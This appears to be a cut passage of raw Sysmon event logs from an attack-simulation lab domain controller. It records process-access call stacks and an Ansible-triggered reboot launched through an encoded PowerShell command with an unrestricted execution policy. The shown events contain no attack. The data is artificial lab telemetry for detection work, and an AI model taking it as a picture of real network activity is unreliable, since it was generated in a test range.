15:50:24.841{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7ACB-5FA1-0700-000000008701}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000547Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.841{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7ACB-5FA1-0700-000000008701}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000546Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.841{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7ACB-5FA1-0700-000000008701}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000545Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.841{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7ACB-5FA1-0700-000000008701}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000544Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.841{D28789B6-7C40-5FA1-0903-000000008701}32084428C:\Windows\system32\conhost.exe{D28789B6-7C40-5FA1-0F03-000000008701}5004C:\Windows\system32\shutdown.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000543Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.825{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000542Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.825{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000541Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.825{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000540Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.825{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000539Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.825{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000538Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.825{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000537Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.825{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000536Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.825{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000535Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.825{D28789B6-7AC1-5FA1-0500-000000008701}6361160C:\Windows\system32\csrss.exe{D28789B6-7C40-5FA1-0F03-000000008701}5004C:\Windows\system32\shutdown.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000534Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.825{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000533Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.825{D28789B6-7C40-5FA1-0E03-000000008701}21883472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7C40-5FA1-0F03-000000008701}5004C:\Windows\system32\shutdown.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+90e532a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+902f412f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+902f3e00(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+90da5465(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+902b4996(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+90312e65(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+902f64ca(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+902f64ca(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+902f635b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+902e82e0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+902f4813(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+902f4406(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+902f412f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+902f3e00(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+90da5465(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+902dac61(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+902da231(wow64) 154100x8000000000000000532Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.838{D28789B6-7C40-5FA1-0F03-000000008701}5004C:\Windows\System32\shutdown.exe10.0.14393.0 (rs1_release.160715-1616)Windows Shutdown and Annotation ToolMicrosoft® Windows® Operating SystemMicrosoft CorporationSHUTDOWN.EXE"C:\Windows\system32\shutdown.exe" /r /t 2 /c "Reboot initiated by Ansible"C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7C40-5FA1-CF12-110000000000}0x1112cf0HighMD5=547993395376742A437D3145AF6B0309,SHA256=F96073C3442EA0A99B4945394007602772DB36732D1511DC2068519526678F8A,IMPHASH=609F1D7580ED496A3076AEBA77DAFC7E{D28789B6-7C40-5FA1-0E03-000000008701}2188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UwBlAHQALQBTAHQAcgBpAGMAdABNAG8AZABlACAALQBWAGUAcgBzAGkAbwBuACAATABhAHQAZQBzAHQACgBzAGgAdQB0AGQAbwB3AG4AIAAvAHIAIAAvAHQAIAAyACAALwBjACAAIgBSAGUAYgBvAG8AdAAgAGkAbgBpAHQAaQBhAHQAZQBkACAAYgB5ACAAQQBuAHMAaQBiAGwAZQAiAAoASQBmACAAKAAtAG4AbwB0ACAAJAA/ACkAIAB7ACAASQBmACAAKABHAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAEwAQQBTAFQARQBYAEkAVABDAE8ARABFACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACkAIAB7ACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUAIAB9ACAARQBsAHMAZQAgAHsAIABlAHgAaQB0ACAAMQAgAH0AIAB9AA== 10341000x8000000000000000531Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.763{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7C40-5FA1-0E03-000000008701}2188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000530Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.763{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7C40-5FA1-0E03-000000008701}2188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000529Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.732{D28789B6-7C40-5FA1-0E03-000000008701}2188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_neepwvwl.ijm.ps12020-11-03 15:50:24.732 10341000x8000000000000000528Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.716{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C40-5FA1-0E03-000000008701}2188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000527Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.685{D28789B6-7C40-5FA1-0903-000000008701}32084428C:\Windows\system32\conhost.exe{D28789B6-7C40-5FA1-0E03-000000008701}2188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000526Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.685{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000525Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.685{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SY